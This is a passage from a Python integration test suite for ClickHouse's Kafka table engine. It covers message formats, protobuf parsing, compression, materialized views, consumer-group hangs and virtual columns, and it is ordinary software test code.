\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:{} --describe --members --group old --verbose".format(cluster.kafka_port)))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': 'localhost:9092'})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
